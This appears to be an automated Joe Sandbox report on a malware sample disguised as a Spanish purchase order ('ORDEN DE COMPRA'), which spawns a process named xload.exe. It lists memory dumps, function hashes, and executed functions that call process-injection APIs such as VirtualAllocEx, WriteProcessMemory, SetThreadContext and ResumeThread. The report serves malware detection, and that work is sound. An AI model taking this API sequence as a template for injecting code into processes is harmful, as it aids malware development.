Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2140000_CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 83409b347fc472478c0218b41accb2ecd7141d3c020a4eaae92c3edf2234dd93
Instruction ID: c344461cf5c72dfdd3b88627f1a4dfe2c5807a6ce61aa5efb03c5e8a0c88885e
Opcode Fuzzy Hash: 83409b347fc472478c0218b41accb2ecd7141d3c020a4eaae92c3edf2234dd93
Instruction Fuzzy Hash: 04C08CB084A6804FCF024B786A582993FF0EB0B220B000083C241C7112D1BC1047D788

Function 02146712 Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1532600831.0000000002140000.00000040.00000800.00020000.00000000.sdmp, Offset: 02140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2140000_CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7e69d27d0a2b77d136900110bef32819122e7e5706c1e0051d088fc91e06b390
Instruction ID: 6b386e550d01048694472a0a5939affd887c4c630ff84fec06485ef8aec3a98e
Opcode Fuzzy Hash: 7e69d27d0a2b77d136900110bef32819122e7e5706c1e0051d088fc91e06b390
Instruction Fuzzy Hash: 83B0027554051587F505D71CDAC47953350F745658FC40984F14497151D62CFA139559

Function 06B7FE5D Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1544664755.0000000006B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b70000_CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9a1f25d0a6f4ff72809fe652211838630d86df9f4f27be09b47e602c5b142805
Instruction ID: e35a3ed694ac51a4f967902a379cdd9fe91deba7a213d6c872c35ef4b292f66a
Opcode Fuzzy Hash: 9a1f25d0a6f4ff72809fe652211838630d86df9f4f27be09b47e602c5b142805
Instruction Fuzzy Hash: 049002A644051D41E2048055158048743C0A2745647554031420595500B168A193606A

Non-executed Functions

Function 06B37BE0 Relevance: 3.3, Instructions: 3301COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1544592389.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b30000_CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8c2eefb574e3605c4ff8943c6bb0f5d274364a1ead178f9748d4508ed197ad9d
Instruction ID: 59c266b894fcf44f064fbdf78302279fd748abf722b0cbd2999971a8c067c7a0
Opcode Fuzzy Hash: 8c2eefb574e3605c4ff8943c6bb0f5d274364a1ead178f9748d4508ed197ad9d
Instruction Fuzzy Hash: A653B1B0A14228CBE754FF78D8887ADBFB2BB85700F5084E9D548A3254DF345E89DB61

Function 0214B028 Relevance: .4, Instructions: 403COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1532600831.0000000002140000.00000040.00000800.00020000.00000000.sdmp, Offset: 02140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2140000_CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aa999ab87db9dfb9aa4b236a6c518730f75ecc7b7de95f4943cc6d510e30036d
Instruction ID: 379c13739c73584375feee525ff46413b328c39ea532d1fdff2b356d1c9c272d
Opcode Fuzzy Hash: aa999ab87db9dfb9aa4b236a6c518730f75ecc7b7de95f4943cc6d510e30036d
Instruction Fuzzy Hash: 7BF11E71E442148FCB14CFADD584AADB7F2FF98318B5A8059E519AB361CB34ED42CB50

Function 0214CBE8 Relevance: .3, Instructions: 327COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1532600831.0000000002140000.00000040.00000800.00020000.00000000.sdmp, Offset: 02140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2140000_CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 091638dc188160e4c71f010d0821564d76223d145928ac950a52f60c9632141b
Instruction ID: d7c1665d5a294fc24ce19e38e3b27a64ae1089228e5a8cd4caff209a87b46d48
Opcode Fuzzy Hash: 091638dc188160e4c71f010d0821564d76223d145928ac950a52f60c9632141b
Instruction Fuzzy Hash: 91B1B430745216CBEB381B79891433A7AA6FFC4615F25892FD85AF6284CF38D841CBD9

Function 0752E510 Relevance: .3, Instructions: 315COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1545045611.0000000007520000.00000040.00000800.00020000.00000000.sdmp, Offset: 07520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7520000_CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4567ca8746dd4b83263973b29128c34bdeb11bb26fbccda51975a828c0257ef9
Instruction ID: 5f73604535fe53be538d425dbed87e45c17096f64188ebf3794af5896b70934d
Opcode Fuzzy Hash: 4567ca8746dd4b83263973b29128c34bdeb11bb26fbccda51975a828c0257ef9
Instruction Fuzzy Hash: FDA19270B006559BEB58EBB8882477F63ABBFC9240F148579D04AD73C4DE399C438BA5

Function 06B3CC20 Relevance: .3, Instructions: 298COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1544592389.0000000006B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b30000_CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f3eb7890732cec11859a25fe03f2f510b8daa11997e5035137ccd562474ebcac
Instruction ID: b70391571c0184733c3d6f93effb8790d0fb6043d9e60e8b6ad0846ef6d1cf4a
Opcode Fuzzy Hash: f3eb7890732cec11859a25fe03f2f510b8daa11997e5035137ccd562474ebcac
Instruction Fuzzy Hash: 6AD1A074B40614CFDB54DFA9C598AA9BBF1BF4C701F2580A9E406AB361DB31AD41CF60

Function 078FF397 Relevance: .3, Instructions: 269COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1545219249.00000000078F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_78f0000_CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6a4f30a17f71c33e27ca32fe1ccc33855ce5036c056384c9f165899bda08ff4e
Instruction ID: de5be67c1d8ecc87fb36763f30877c40b1d1677e92cce1236510e9c4a4acad4c
Opcode Fuzzy Hash: 6a4f30a17f71c33e27ca32fe1ccc33855ce5036c056384c9f165899bda08ff4e
Instruction Fuzzy Hash: 8ED1E57591075A8ADB11EB68D850AD9B7B1FF99300F10CB9AD4093B221EF706AC9CF91

Function 078FF3A8 Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1545219249.00000000078F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_78f0000_CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e8121320a644c6a85f3108d93ad0badb9d58991a200d39b94df67d1b4551e25d
Instruction ID: c159ee4fe51a71f6a1b342d79f9ad44f4a3275277e0d68f1a74caaf0c87d4992
Opcode Fuzzy Hash: e8121320a644c6a85f3108d93ad0badb9d58991a200d39b94df67d1b4551e25d
Instruction Fuzzy Hash: 8BD1E47591075A8ADB11EB68D850AD9B7B1FF99300F10CB9AD4093B221EF706AC9CF91

Function 078FBA28 Relevance: .3, Instructions: 260COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1545219249.00000000078F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_78f0000_CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 99a0189ca100bd812ac13f546ded9adac9e12015fd22eda1dfc2308033783657
Instruction ID: 7a575049e37dd773849598f9e2711f9bc5ba6c9fe05088018962818502523a50
Opcode Fuzzy Hash: 99a0189ca100bd812ac13f546ded9adac9e12015fd22eda1dfc2308033783657
Instruction Fuzzy Hash: C38180B4F0021DDBDB28AF75986467E7BB7BFC8710B14856ED416E7384CE3598028B91

Analysis Process: xload.exePID: 5800, Parent PID: 3504COMMON

Execution Graph

Execution Coverage:	18.6%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	1.9%
Total number of Nodes:	156
Total number of Limit Nodes:	16

Executed Functions

Function 0705AC80 Relevance: 1.7, APIs: 1, Instructions: 164
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessAsUserW.KERNEL32(?,?,?,0000000A,?,?,?,?,?,?,?), ref: 0705ADEB

Memory Dump Source

Source File: 00000011.00000002.2329490892.0000000007050000.00000040.00000800.00020000.00000000.sdmp, Offset: 07050000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7050000_xload.jbxd

Similarity

API ID: CreateProcessUser
String ID:
API String ID: 2217836671-0
Opcode ID: 97e64b5ab0430efa8f2eb59ca2df4eb5a5662448d302455c25f79f315d910cd6
Instruction ID: 0a8bb4759b4b7e5c41251050193c717b2f2c993fa15aad9758a746e9583e3bf2
Opcode Fuzzy Hash: 97e64b5ab0430efa8f2eb59ca2df4eb5a5662448d302455c25f79f315d910cd6
Instruction Fuzzy Hash: 5E5108B190032ADFDB25CF59C840BDEBBB1BF48314F0485AAE919B7250DB71AA85DF50

Function 00DC8448 Relevance: 1.0, Instructions: 962COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2309492594.0000000000DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_dc0000_xload.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f1082e6dc43ef630eb7bf3c6ba7a2fae85e21361d95a005bab567ebdb43e9bf5
Instruction ID: 5895668b42d0e1a02b9515c65c521cabd26fdda0f84d6ba253b79481053f04f7
Opcode Fuzzy Hash: f1082e6dc43ef630eb7bf3c6ba7a2fae85e21361d95a005bab567ebdb43e9bf5
Instruction Fuzzy Hash: 95824C70A0021A9FDB14CF69D894FAEBBF6FF88301F188169E845AB251DB35DD41DB60

Function 00DC9220 Relevance: .9, Instructions: 914COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2309492594.0000000000DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_dc0000_xload.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 61e2ba53115c1812a492a5c7dca1253cc4aa107d2929cf17e332cbdd9e5a2163
Instruction ID: 2dc231d2d0f41cd1e60cc8819149c61bd03cd41d0ff3bd4a737cf498c13b0560
Opcode Fuzzy Hash: 61e2ba53115c1812a492a5c7dca1253cc4aa107d2929cf17e332cbdd9e5a2163
Instruction Fuzzy Hash: E7822970A006069FCB15CF68D598FAEFBF2BF88315F198559E446AB2A1D730ED41CB60

Function 05DE4598 Relevance: .6, Instructions: 601COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2328609401.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_5de0000_xload.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 86a3340715d7fbb6ff450bc3c3784b8dc021ed42eecae9865e6611f55dc02b93
Instruction ID: 71c36ed9b91ad5e048dbb679b2beee53c290622954c74df21ada218b088c0c6f
Opcode Fuzzy Hash: 86a3340715d7fbb6ff450bc3c3784b8dc021ed42eecae9865e6611f55dc02b93
Instruction Fuzzy Hash: E7526D34A007458FDB14EF64C844B99B7F2BF89314F2582A9D4586F3A2DB71AD86CF81

Function 05DE45E8 Relevance: .6, Instructions: 596COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2328609401.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_5de0000_xload.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e71615e2f6a84aae2925ed199e69456216e7fba128ef676ab5cb751b9f8e0f31
Instruction ID: ba7a7582c4f841edf2a72c7b95f110c51bd720d1860b26774be324b1b92e9311
Opcode Fuzzy Hash: e71615e2f6a84aae2925ed199e69456216e7fba128ef676ab5cb751b9f8e0f31
Instruction Fuzzy Hash: 9E526C34A007458FCB14EF64C844B99B7F2BF89314F2582A9D5586F3A2DB71AD86CF81

Function 05DE45D8 Relevance: .6, Instructions: 586COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2328609401.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_5de0000_xload.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a078c686106da5ba94903ef736f8be26cc939817ca87df7ba6f384eaaf9b4009
Instruction ID: 99022b47a81b32b99c46fc73059748e9a28df757772799436b13f804339c17ac
Opcode Fuzzy Hash: a078c686106da5ba94903ef736f8be26cc939817ca87df7ba6f384eaaf9b4009
Instruction Fuzzy Hash: 7B526C34A007458FCB14DF64C844B99B7F2BF89314F2582A9D5586F3A2DB71AD86CF81

Function 0705D6E0 Relevance: 1.6, APIs: 1, Instructions: 69
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 0705D770

Memory Dump Source

Source File: 00000011.00000002.2329490892.0000000007050000.00000040.00000800.00020000.00000000.sdmp, Offset: 07050000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7050000_xload.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 444acf1d9327399de71854532539dd5f9d1104bb58f302f0c302743b3f8c7e2e
Instruction ID: f53dfcb1caa48092fe20573ecaf45aebe64382fc680cf330199f9abaa2296813
Opcode Fuzzy Hash: 444acf1d9327399de71854532539dd5f9d1104bb58f302f0c302743b3f8c7e2e
Instruction Fuzzy Hash: 432139B5900309DFDB10CFA9C885BDEBBF5FF48310F14842AE959A7240D7789954CBA4

Function 0705DE60 Relevance: 1.6, APIs: 1, Instructions: 63
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0705DEDE

Memory Dump Source

Source File: 00000011.00000002.2329490892.0000000007050000.00000040.00000800.00020000.00000000.sdmp, Offset: 07050000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7050000_xload.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 3dab46e5fb625911293d2222d9e353291fdf4aca8c1dc2309c3e99f9e1801979
Instruction ID: b8298cb311f9012b9d953950b9acfc4125f0bd93f2b71f7fb05dc7f80ea170b3
Opcode Fuzzy Hash: 3dab46e5fb625911293d2222d9e353291fdf4aca8c1dc2309c3e99f9e1801979
Instruction Fuzzy Hash: 682147B19003098FDB14DFAAC4857EFBBF4EF48214F14842AD859A7240DB78A945CFA0

Function 0705CC98 Relevance: 1.6, APIs: 1, Instructions: 63
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64GetThreadContext.KERNEL32(?,00000000), ref: 0705CD16

Memory Dump Source

Source File: 00000011.00000002.2329490892.0000000007050000.00000040.00000800.00020000.00000000.sdmp, Offset: 07050000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7050000_xload.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 205673b3104dba8b5354986bcbd14f40eb4c151a1faa4fd22fd77f517ea22477
Instruction ID: 6571dcd2ec237735d9556101daf657f64a2980ad4e9149f3de02c0727e54a60c
Opcode Fuzzy Hash: 205673b3104dba8b5354986bcbd14f40eb4c151a1faa4fd22fd77f517ea22477
Instruction Fuzzy Hash: 772149B1D003099FEB10CFAAC4857EFBBF4EF49210F14842AD859A7240D7789944CFA0

Function 0705DBD8 Relevance: 1.6, APIs: 1, Instructions: 60
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtectEx.KERNEL32(?,?,?,?,?), ref: 0705DC4F

Memory Dump Source

Source File: 00000011.00000002.2329490892.0000000007050000.00000040.00000800.00020000.00000000.sdmp, Offset: 07050000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7050000_xload.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 50baa4fc22696d61b008a75b91fee17de83376d92e258bd88ef3745bcc74e246
Instruction ID: 4fcbaba9ee96a8bc2b8f6b79d235a8bd13805d47b61886af58294d74f1c19bf1
Opcode Fuzzy Hash: 50baa4fc22696d61b008a75b91fee17de83376d92e258bd88ef3745bcc74e246
Instruction Fuzzy Hash: E72118B19003099FDB10CFAAC4847EEBBF5EF48310F14842AD559A7240D7799545DFA1

Function 05DF3CC0 Relevance: 1.6, APIs: 1, Instructions: 59
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLongPathNameW.KERNEL32(00000000), ref: 05DFC2C0

Memory Dump Source

Source File: 00000011.00000002.2328657018.0000000005DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_5df0000_xload.jbxd

Similarity

API ID: LongNamePath
String ID:
API String ID: 82841172-0
Opcode ID: 25b4da4404489c0de625e07be3f074aa6cb4cea61f554241115b731487137219
Instruction ID: 874db283d878fef1857bcb1772e5978742cd137468297b5176868cae7bedc7e0
Opcode Fuzzy Hash: 25b4da4404489c0de625e07be3f074aa6cb4cea61f554241115b731487137219
Instruction Fuzzy Hash: AD2144B2C1465A9BDB10CF9AC4447AEFBB0FF48320F11812AD959B7340D378A914CFA4

Function 070FBD21 Relevance: 1.6, APIs: 1, Instructions: 57
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNEL32(?,?,?,?), ref: 070FBD9B

Memory Dump Source

Source File: 00000011.00000002.2329598302.00000000070F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_70f0000_xload.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 6dc2f4a115cbb139c41a84bb4441405630c3d40f02e69d31c9391d00157a6d33
Instruction ID: 85bb5e2a173f3b99f27166d40efaab58b371a25ab7b3778b5175e176afc92397
Opcode Fuzzy Hash: 6dc2f4a115cbb139c41a84bb4441405630c3d40f02e69d31c9391d00157a6d33
Instruction Fuzzy Hash: 1121D6B59006499FDB10CF9AC484BDEFBF4FB48310F10842AE958A7650D378A544CFA5

Function 07053CF2 Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(?,?,?,?), ref: 07053D6B

Memory Dump Source

Source File: 00000011.00000002.2329490892.0000000007050000.00000040.00000800.00020000.00000000.sdmp, Offset: 07050000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7050000_xload.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 1bb3c789df50c5e01825cc88fb745daa2bbbc9386a6c59e7dd9eda39bd59c371
Instruction ID: bd42a5cba4589fa97e3a409bf7c49295379b7ebdc797bd8457f8f4c38b12333d
Opcode Fuzzy Hash: 1bb3c789df50c5e01825cc88fb745daa2bbbc9386a6c59e7dd9eda39bd59c371
Instruction Fuzzy Hash: D321D8B59006599FDB10CF9AD484BDEFBF4FB48310F14842AE968A7251D3749544CFA1

Function 07053CF8 Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(?,?,?,?), ref: 07053D6B

Memory Dump Source

Source File: 00000011.00000002.2329490892.0000000007050000.00000040.00000800.00020000.00000000.sdmp, Offset: 07050000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7050000_xload.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: ffe2ede648f8aeda0e18f278a06e1e5a13edf31214e8251c3ce2fe70e5483ce9
Instruction ID: b0e9608d15178a7f681d4104ee2b29d395e8beadfea3bba48b043b7dc868cf17
Opcode Fuzzy Hash: ffe2ede648f8aeda0e18f278a06e1e5a13edf31214e8251c3ce2fe70e5483ce9
Instruction Fuzzy Hash: F521E4B59006499FDB10CF9AD484BDEFBF4FF48320F10842AE968A7250D378A644CFA5

Function 070FBD28 Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(?,?,?,?), ref: 070FBD9B

Memory Dump Source

Source File: 00000011.00000002.2329598302.00000000070F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_70f0000_xload.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: e59f1328873e00cef425b2307a6bb102947340e08461dacd5652b644af2dd29b
Instruction ID: 76a3cea8a4c0080056fd8dca9e46f177598cb7dcb3bb4bc879bbf434cd1bd605
Opcode Fuzzy Hash: e59f1328873e00cef425b2307a6bb102947340e08461dacd5652b644af2dd29b
Instruction Fuzzy Hash: 7E21F6B59006499FDB10CF9AC484BDEFBF4FF48320F10842AE958A7650D378A644CFA5

Function 0705D368 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 0705D3D6

Memory Dump Source

Source File: 00000011.00000002.2329490892.0000000007050000.00000040.00000800.00020000.00000000.sdmp, Offset: 07050000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7050000_xload.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 72303fb82d518fa651314059688b06b4896598c67fdc3cd18326810cf0e23082
Instruction ID: f32bfd0b78ed80bdaca79682d7663c1fbe58c644266681deff17490d8f56746e
Opcode Fuzzy Hash: 72303fb82d518fa651314059688b06b4896598c67fdc3cd18326810cf0e23082
Instruction Fuzzy Hash: 1E1137729003499FDB10DFAAC884BEFBBF5EF48310F14841AE559A7250C775A554CFA1

Function 0705E0E8 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNEL32 ref: 0705E14A

Memory Dump Source

Source File: 00000011.00000002.2329490892.0000000007050000.00000040.00000800.00020000.00000000.sdmp, Offset: 07050000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7050000_xload.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 7de27d9c25ee19ca66982b238132d331cf7a0fb0816fedefd9eb8c9e5856fc6d
Instruction ID: 5dfff8c4b91113dc758bb51c5a5c6b51e2df3c02af1521bccbce5b0fff1299aa
Opcode Fuzzy Hash: 7de27d9c25ee19ca66982b238132d331cf7a0fb0816fedefd9eb8c9e5856fc6d
Instruction Fuzzy Hash: 8A113AB19003498FDB10DFAAC4457DFFBF4EF49210F148429D559A7340C779A544CB94

Function 0705BCD8 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 0705E735

Memory Dump Source

Source File: 00000011.00000002.2329490892.0000000007050000.00000040.00000800.00020000.00000000.sdmp, Offset: 07050000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7050000_xload.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: bfbab1df8082eb9075079a8007e4467f3cc243bdab7f4b0281206ce8daaeb087
Instruction ID: ab40e1966c06fe23f0c2d04243c37e1dedf101eb8173a21ba61a54ab609e764a
Opcode Fuzzy Hash: bfbab1df8082eb9075079a8007e4467f3cc243bdab7f4b0281206ce8daaeb087
Instruction Fuzzy Hash: E311F2B5800349DFDB10CF9AC889BDFBBF8EB48310F10845AE998A7600D375A944CFA5

Function 05DEBA4A Relevance: 1.4, Strings: 1, Instructions: 145COMMON

Download Yara Rule

Strings

`, xrefs: 05DEBA2E

Memory Dump Source

Source File: 00000011.00000002.2328609401.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_5de0000_xload.jbxd

Similarity

API ID:
String ID: `
API String ID: 0-2679148245
Opcode ID: 13a9d6b4f31db5300ffe7021ea0a87c3f066bf185f1f6fa47989262884632e81
Instruction ID: 1dc3dac2fa17ef67309d3416849be6d2e070f96c345a7c8e8e177f7bcd908e0f
Opcode Fuzzy Hash: 13a9d6b4f31db5300ffe7021ea0a87c3f066bf185f1f6fa47989262884632e81
Instruction Fuzzy Hash: 6C517371700B00CFEB25FB24C895B7AB3A2FF85315F14866BD0968B2A0DB71B846CB51

Function 072D0AA8 Relevance: 1.3, APIs: 1, Instructions: 48COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?), ref: 072D0B08

Memory Dump Source

Source File: 00000011.00000002.2329806536.00000000072D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_72d0000_xload.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 41c41944ae8663a337feaa15fe3cc9cc15583b2c5fb137fc7808624cc0460f23
Instruction ID: 987a4e03ffa0a6c8bc5df56af29cb0fc6be58353b4f15d87c176608cc8267b5f
Opcode Fuzzy Hash: 41c41944ae8663a337feaa15fe3cc9cc15583b2c5fb137fc7808624cc0460f23
Instruction Fuzzy Hash: 2C1136B5810649CFDB20CF9AC445BDEBBF4EF48320F20842AD568A7740D778A944CFA5

Function 072D0AB0 Relevance: 1.3, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?), ref: 072D0B08

Memory Dump Source

Source File: 00000011.00000002.2329806536.00000000072D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_72d0000_xload.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: b996c2d15780e17ce75df96e37164fc9147483a8df5384881b7bfa6295c21d1a
Instruction ID: f92844692c7ce73f653296aca9feeb8950bac043d9fee2c99a0f4373e6004430
Opcode Fuzzy Hash: b996c2d15780e17ce75df96e37164fc9147483a8df5384881b7bfa6295c21d1a
Instruction Fuzzy Hash: C91133B5800349CFDB20CF9AC484BDEBBF4EB48320F20842AD568A7340D378A944CFA5

Function 05DE2268 Relevance: .8, Instructions: 778COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2328609401.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_5de0000_xload.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 252e1aa01708cbd7038b40ee77cabf7dcc96ea0c7dca1d0bf3d88e9e4c2f904e
Instruction ID: 78b629229e5cc0164c9a1cfd44be26767c49b55acb82aa753001f8392ceb5a93
Opcode Fuzzy Hash: 252e1aa01708cbd7038b40ee77cabf7dcc96ea0c7dca1d0bf3d88e9e4c2f904e
Instruction Fuzzy Hash: ED62CB74F01B818ADF79EB64C9A83EE7AB5BB41314F60491FD1BACB380DB3494418B95

Function 00DCA2E8 Relevance: .7, Instructions: 693COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2309492594.0000000000DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_dc0000_xload.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 45b6f3188a8dff65541f014e6aa9a461dece3b8bcde6f94b733de598e69437f2
Instruction ID: df61b160427df89593dd42f9f7f336a73fcc4c87ffccd9f91ced4632c2ecba6b
